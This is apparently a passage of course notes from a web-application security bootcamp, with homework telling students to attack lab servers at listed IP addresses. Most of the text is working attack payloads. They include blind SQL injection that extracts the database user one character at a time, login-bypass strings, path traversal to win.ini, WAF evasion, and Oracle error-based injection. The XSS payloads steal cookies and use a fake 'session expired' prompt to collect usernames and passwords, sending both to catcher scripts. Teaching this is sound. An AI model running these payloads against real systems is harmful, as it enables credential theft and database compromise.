  857. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  858. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  859. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  860. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  861.  
  862. B - 2nd Character
  863. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  864. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  865.  
  866. O - 3rd Character
  867. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  868. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  869. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  870. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  871. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  872. http://54.213.100.93/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  873.  
  874.  
  875.  
  876.  
  877.  
  878.  
  879.  
  880.  
  881.  
  882.  
  883. ###################################################################
  884. # What is XSS #
  885. # https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #
  886. ###################################################################
  887.  
  888. OK - what is Cross Site Scripting (XSS)
  889.  
  890. 1. Use Firefox to browse to the following location:
  891.  
  892. http://54.172.112.249/xss_practice/
  893.  
  894. A really simple search page that is vulnerable should come up.
  895.  
  896.  
  897.  
  898.  
  899. 2. In the search box type:
  900.  
  901. <script>alert('So this is XSS')</script>
  902.  
  903.  
  904. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  905. Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
  906.  
  907.  
  908. 3. In the search box type:
  909.  
  910. <script>alert(document.cookie)</script>
  911.  
  912.  
  913. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  914. Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
  915.  
  916. 4. Now replace that alert script with:
  917.  
  918. <script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  919.  
  920.  
  921. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  922.  
  923.  
  924. 5. Now view the stolen cookie at:
  925. http://54.172.112.249/xss_practice/cookie_stealer_logs.html
  926.  
  927.  
  928. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  929.  
  930.  
  931.  
  932.  
  933.  
  934.  
  935. ############################
  936. # A Better Way To Demo XSS #
  937. ############################
  938.  
  939.  
  940. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  941.  
  942.  
  943. Use Firefox to browse to the following location:
  944.  
  945. http://54.172.112.249/xss_practice/
  946.  
  947.  
  948.  
  949. Paste this in the search box
  950. ----------------------------
  951.  
  952.  
  953. Option 1
  954. --------
  955.  
  956. <script>
  957. password=prompt('Your session is expired. Please enter your password to continue',' ');
  958. document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">");
  959. </script>
  960.  
  961.  
  962. Now view the stolen cookie at:
  963. http://54.172.112.249/xss_practice/passwords.html
  964.  
  965.  
  966.  
  967. Option 2
  968. --------
  969. <script>
  970. username=prompt('Please enter your username',' ');
  971. password=prompt('Please enter your password',' ');
  972. document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
  973. </script>
  974.  
  975.  
  976.  
  977.  
  978. Now view the stolen cookie at:
  979. http://54.172.112.249/xss_practice/username_password_logs.html
  980.  
  981.  
  982.  
  983.  
  984. #########################################
  985. # Let's kick it up a notch with ASP.NET #
  986. # http://54.200.178.220/ #
  987. #########################################
  988.  
  989.  
  990. The trading Web App is on http://54.200.178.220/
  991.  
  992.  
  993. Try the following in the search box:
  994. <script>alert(123);</script>
  995. ' or 1=1
  996. ' and a=a
  997. 1=1
  998. Joe'+OR+1=1;--
  999.  
  1000.  
  1001. <script>alert(123);</script>
  1002.  
  1003. Open a new tab in firefox and try this:
  1004. http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName
  1005.  
  1006.  
  1007. Try the contact us form.
  1008. Open a new tab in firefox and try this:
  1009. http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini
  1010.  
  1011. Try this on the inquiry form:
  1012. Joe McCray
  1013. 1234567890
  1014. joe@strategicsec.com') waitfor delay '00:00:10'--
  1015.  
  1016.  
  1017. Login Box:
  1018.  
  1019. ' or 1=1 or ''='
  1020. anything (click login instead of pressing enter)
  1021.  
  1022.  
  1023.  
  1024. Tamper Data: (notice 2 session IDs)
  1025.  
  1026. AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
  1027. IsAdmin=yes;
  1028. ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
  1029.  
  1030.  
  1031.  
  1032. Profile - Detail (tamper data)
  1033. Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
  1034. joe|set
  1035.  
  1036.  
  1037. xss_upload.txt (Upload Bulk Order)
  1038. <script>alert(123);</script>
  1039.  
  1040.  
  1041.  
  1042.  
  1043.  
  1044.  
  1045. Day 1 Homework:
  1046.  
  1047.  
  1048. Day 1 Challenge (Due 12 December):
  1049. Use Burp Suite to demonstrate with screenshots and explanations of how to test for the all of the OWASP Top 10 vulnerabilities against your choice of targets the following targets:
  1050. http://strategicsec.com
  1051. http://54.213.100.93/
  1052. http://54.172.112.249/
  1053. http://54.200.178.220/
  1054. http://54.213.131.105/
  1055.  
  1056. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day1-Challenge.docx)
  1057.  
  1058.  
  1059.  
  1060. Day 2 Video:
  1061. https://s3.amazonaws.com/StrategicSec-Videos/2015/2015-12-13+09.25+Burp+Suite+Weekend+Bootcamp.mp4
  1062.  
  1063.  
  1064. Day 2 Challenge (Due 19 December):
  1065. ----------------------------------
  1066. Use the StrategicSec Ubuntu VM to demonstrate how to install, configure, and use at least five (5) of the following Burp Suite extensions from these websites and lists below:
  1067. https://github.com/integrissecurity/carbonator
  1068. https://github.com/allfro/BurpKit
  1069. https://github.com/nccgroup/BurpSuiteLoggerPlusPlus
  1070. https://github.com/Quitten/Autorize
  1071. https://github.com/codewatchorg/sqlipy
  1072. https://github.com/augustd/burp-suite-token-fetcher
  1073. https://github.com/augustd/burp-suite-gwt-scan
  1074.  
  1075. https://webbreacher.wordpress.com/2015/07/25/my-favorite-burp-suite-extensions/
  1076. http://bughunting.guide/the-top-5-burp-suite-extensions/
  1077. https://www.codemagi.com/downloads/
  1078.  
  1079.  
  1080.  
  1081. You must use them against your choice of targets the following targets:
  1082. http://strategicsec.com
  1083. http://54.213.100.93/
  1084. http://54.172.112.249/
  1085. http://54.200.178.220/
  1086. http://54.213.131.105/
  1087.  
  1088. Submit the results via email in an MS Word document with (naming convention example:
  1089. YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day2-Challenge.docx)
  1090.  
  1091.  
  1092. ###############################
  1093. # How much fuzzing is enough? #
  1094. ###############################
  1095. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
  1096.  
  1097. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
  1098.  
  1099.  
  1100. Step 1: Ask yourself the 3 questions per page of the site.
  1101.  
  1102. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
  1103.  
  1104. Step 3: When you load your fuzz strings - use the following decision tree
  1105.  
  1106. - Are the fuzz strings causing a default error message (example 404)?
  1107. - If this is the case then it is most likely NOT vulnerable
  1108.  
  1109. - Are the fuzz strings causing a WAF or LB custom error message?
  1110. - If this is the case then you need to find an encoding method to bypass
  1111.  
  1112.  
  1113. - Are the fuzz strings causing an error message that discloses the backend type?
  1114. - If yes, then identify DB type and find correct syntax to successfully exploit
  1115. - Some example strings that I use are:
  1116. '
  1117. "
  1118. () <----- Take the parameter value and put it in parenthesis
  1119. (5-1) <----- See if you can perform an arithmetic function
  1120.  
  1121.  
  1122. - Are the fuzz strings rendering executable code?
  1123. - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
  1124. - Some example strings that I use are:
  1125. <b>hello</b>
  1126. <u>hello</u>
  1127. <script>alert(123);</script>
  1128. <script>alert(xss);</script>
  1129. <script>alert('xss');</script>
  1130. <script>alert("xss");</script>
  1131.  
  1132.  
  1133.  
  1134.  
  1135.  
  1136.  
  1137. ############################
  1138. # Trading Web App with WAF #
  1139. # http://54.213.131.105 #
  1140. ############################
  1141.  
  1142.  
  1143. Try the following in the search box:
  1144. <script>alert(123);</script>
  1145. <script>alert(123);</script
  1146. <script>alert(123)
  1147. <script>alert
  1148. <script>
  1149. <script
  1150. <scrip
  1151. <scri
  1152. <scr
  1153. <sc
  1154. <s
  1155. <p
  1156. <
  1157. < s
  1158. Joe'+OR+1=1;--
  1159.  
  1160.  
  1161. Open a new tab in firefox and try this:
  1162. http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName
  1163.  
  1164.  
  1165. xss_upload.txt (Upload Bulk Order)
  1166. <script>alert(123);</script>
  1167.  
  1168.  
  1169. Login Box:
  1170.  
  1171. ' or 1=1 or ''='
  1172. anything
  1173.  
  1174.  
  1175.  
  1176. Tamper Data: (notice 2 session IDs)
  1177.  
  1178. AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
  1179. IsAdmin=yes;
  1180. ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
  1181.  
  1182.  
  1183.  
  1184. Profile - Detail (tamper data)
  1185. Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
  1186. joe|set
  1187.  
  1188.  
  1189.  
  1190.  
  1191.  
  1192.  
  1193.  
  1194. ###########################################################
  1195. # Attacking an Oracle/JSP based WebApp with SQL Injection #
  1196. ###########################################################
  1197.  
  1198.  
  1199.  
  1200.  
  1201.  
  1202. http://54.69.156.253:8081/bookcompany/
  1203.  
  1204.  
  1205. user: a' OR 'a'='a
  1206. pass: a' OR 'a'='a
  1207.  
  1208.  
  1209.  
  1210.  
  1211.  
  1212.  
  1213.  
  1214. http://54.69.156.253:8081/bookcompany/author.jsp?id=111
  1215.  
  1216.  
  1217. [ Search by Username ] Joe' OR 'a'='a
  1218.  
  1219.  
  1220.  
  1221.  
  1222.  
  1223.  
  1224.  
  1225.  
  1226.  
  1227.  
  1228.  
  1229.  
  1230. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1
  1231.  
  1232.  
  1233.  
  1234. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1
  1235.  
  1236.  
  1237.  
  1238.  
  1239.  
  1240.  
  1241.  
  1242.  
  1243.  
  1244.  
  1245.  
  1246.  
  1247.  
  1248.  
  1249.  
  1250. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
  1251.  
  1252.  
  1253. Host is running:
  1254.  
  1255.  
  1256.  
  1257.  
  1258.  
  1259. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--
  1260.  
  1261. User is:
  1262.  
  1263.  
  1264.  
  1265.  
  1266.  
  1267. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--
  1268.  
  1269. Current database is:
  1270.  
  1271.  
  1272. #######################
  1273. # Burp Suite Bootcamp #
  1274. #######################
  1275. http://data.serviceplatform.org/wsdl_grabbing/seekda-wsdls.with_ini/36-CurrencyConvertor.wsdl
  1276.  
  1277.  
  1278. ####################
  1279. # Course Materials #
  1280. ####################
  1281.  
  1282. Slides:
  1283. https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/WebAppSecIsNotEasyButCanBeSimple.pptx
  1284. https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/Burp+Suite.pptx
  1285.  
  1286.  
  1287. Lab Manual:
  1288. https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/BurpSuite-Bootcamp-v1.pdf
  1289.  
  1290.  
  1291. Day 1 Video:
  1292. https://s3.amazonaws.com/StrategicSec-Videos/2015/2015-12-06+09.10+Burp+Suite+Weekend+Bootcamp.mp4
  1293.  
  1294.  
  1295. Day 1 Homework:
  1296.  
  1297.  
  1298. Day 1 Challenge (Due 12 December):
  1299. Use Burp Suite to demonstrate with screenshots and explanations of how to test for the all of the OWASP Top 10 vulnerabilities against your choice of targets the following targets:
  1300. http://strategicsec.com
  1301. http://54.213.100.93/
  1302. http://54.186.248.116/
  1303. http://54.200.178.220/
  1304. http://54.213.131.105/
  1305.  
  1306. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day1-Challenge.docx)
  1307.  
  1308.  
  1309.  
  1310. Day 2 Video:
  1311. https://s3.amazonaws.com/StrategicSec-Videos/2015/2015-12-13+09.25+Burp+Suite+Weekend+Bootcamp.mp4
  1312.  
  1313.  
  1314. Day 2 Challenge (Due 19 December):
  1315. ----------------------------------
  1316. Use the StrategicSec Ubuntu VM to demonstrate how to install, configure, and use at least five (5) of the following Burp Suite extensions from these websites and lists below:
  1317. https://github.com/integrissecurity/carbonator
  1318. https://github.com/allfro/BurpKit
  1319. https://github.com/nccgroup/BurpSuiteLoggerPlusPlus
  1320. https://github.com/Quitten/Autorize
  1321. https://github.com/codewatchorg/sqlipy
  1322. https://github.com/augustd/burp-suite-token-fetcher
  1323. https://github.com/augustd/burp-suite-gwt-scan
  1324.  
  1325. https://webbreacher.wordpress.com/2015/07/25/my-favorite-burp-suite-extensions/
  1326. http://bughunting.guide/the-top-5-burp-suite-extensions/
  1327. https://www.codemagi.com/downloads/
  1328.  
  1329.  
  1330.  
  1331. You must use them against your choice of targets the following targets:
  1332. http://strategicsec.com
  1333. http://54.213.100.93/
  1334. http://54.186.248.116/
  1335. http://54.200.178.220/
  1336. http://54.213.131.105/
  1337.  
  1338. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day2-Challenge.docx)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement